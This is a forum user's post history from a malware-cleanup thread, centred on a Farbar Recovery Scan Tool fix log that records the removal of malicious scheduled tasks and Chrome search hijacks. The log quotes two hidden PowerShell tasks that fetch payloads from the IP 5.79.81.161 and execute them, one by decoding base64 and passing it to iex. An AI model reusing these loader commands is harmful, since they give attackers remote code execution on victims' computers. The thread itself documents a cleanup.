NenshoOkami

Everything posted by NenshoOkami

  1. Yeah sorry, it's been a rough week at work, I barely had time to use on the PC. I'm sorry, my parents deleted Malwarebytes (they tend to be skeptical with anything that's not Avast). Thanks for your help though.
  2. Yeah, I haven't been home these days, when I get home I'll do it if my parents haven't uninstalled Malwarebytes.
  3. Done, thanks again! For now there was no instance of PowerShell opening itself. Thanks again!
  4. Fix result of Farbar Recovery Scan Tool (x64) Version: 26-09-2017 01
     Ran by Luna} (29-09-2017 12:33:19) Run:2
     Running from C:\Users\Luna}\Desktop\frst
     Loaded Profiles: Luna} (Available Profiles: defaultuser0 & Luna})
     Boot Mode: Normal
     ==============================================
     fixlist content:
     *****************
     CloseProcesses:
     CreateRestorePoint:
     HKU\S-1-5-21-2514381102-4124612222-254268757-1002\...\Run: [GoogleChromeAutoLaunch_6D20AE1FDA97B1FAC0FBC36117A0CF97] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1451352 2017-09-21] (Google Inc.)
     CHR StartupUrls: Default -> "","hxxps://www.google.com.ar/","hxxp://www.searchult.com/?bd=hp&oem=testsinstcr&uid=TOSHIBAXDT01ACA050_34FGJHVBSXX34FGJHVBSX&version=2.3.0.8956&pid=414031160&tid=440","hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggVdFsMA11BFBhFI1oPTA1EEg0OeFhbAxQQGANAIQtbVA9HEAwFIk0FA1oDB0VXfV5bFElXTwhuL0tdM1wCVFlXM3FNAw=="
     CHR DefaultSearchKeyword: Default -> qs
     C:\ProgramData\mntemp
     C:\Users\Luna}\AppData\LocalLow\勇者と魔法使いとおとぎの絵本
     Task: {3E0D3E87-D3B8-43B9-B81D-AB47A4199623} - System32\Tasks\Windows Emergency Update => powershell -w hidden -nopr "$o=new-object -com inTeRnETexplOrer.aPplicATiON;$o.viSIblE=$false;$o.nAVIGaTE(\"5.79.81.161/eech8ahZ\");sleep 10;iex([Text.Encoding]::utF8.geTStrIng([Convert]::FROmbasE64stRiNG($o.dOCUmeNT.bodY.INnERTEXt)))"
     Task: {F359782D-2D19-4CE4-87EF-E07085649319} - System32\Tasks\SeraphX => powershell.exe -windowstyle hidden -noprofile $loc=$env:temp+'\stage.bin';$deloc= $env:temp+'\stage.ps1';if(![system.io.file]::exists($loc)){(new-object system.net.webclient).downloadfile('hxxp://5.79.81.161/stage.bin',$loc);}$file=[system.io.file]::readallbytes($loc);$revfile=@(0)*$file.length;for($i=0;$i -lt $fi (the data entry has 420 more characters).
     AlternateDataStreams: C:\Users\Luna}\AppData\Local\Temp:$DATA [16]
     EmptyTemp:
     *****************
     Processes closed successfully.
     Restore point was successfully created.
     HKU\S-1-5-21-2514381102-4124612222-254268757-1002\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_6D20AE1FDA97B1FAC0FBC36117A0CF97 => value removed successfully
     Chrome StartupUrls => removed successfully
     Chrome DefaultSearchKeyword => removed successfully
     C:\ProgramData\mntemp => moved successfully
     C:\Users\Luna}\AppData\LocalLow\勇者と魔法使いとおとぎの絵本 => moved successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3E0D3E87-D3B8-43B9-B81D-AB47A4199623} => key removed successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3E0D3E87-D3B8-43B9-B81D-AB47A4199623} => key removed successfully
     C:\Windows\System32\Tasks\Windows Emergency Update => moved successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows Emergency Update => key removed successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F359782D-2D19-4CE4-87EF-E07085649319} => key removed successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F359782D-2D19-4CE4-87EF-E07085649319} => key removed successfully
     C:\Windows\System32\Tasks\SeraphX => moved successfully
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SeraphX => key removed successfully
     C:\Users\Luna}\AppData\Local\Temp => ":$DATA" ADS removed successfully.
     =========== EmptyTemp: ==========
     BITS transfer queue => 32768 B
     DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 14868670 B
     Java, Flash, Steam htmlcache => 7219252 B
     Windows/system/drivers => 38212 B
     Edge => 0 B
     Chrome => 363806873 B
     Firefox => 0 B
     Opera => 0 B
     Temp, IE cache, history, cookies, recent:
     Default => 0 B
     Users => 0 B
     ProgramData => 0 B
     Public => 0 B
     systemprofile => 128 B
     systemprofile32 => 128 B
     LocalService => 7514 B
     NetworkService => 0 B
     defaultuser0 => 0 B
     Luna} => 60150269 B
     RecycleBin => 709645194 B
     EmptyTemp: => 1.1 GB temporary data Removed.
     ================================
     The system needed a reboot.
     ==== End of Fixlog 12:34:54 ====
     There you go, thanks for the help, I'll let you know if the problem persists!
  5. Just like the title says, after I disabled Windows Defender for some minutes to open some stuff up that was tagged as "cracker" or something like that, it started happening. Malwarebytes scanner showed 0 identified threats. What should I do? Thanks! Addition.txt FRST.txt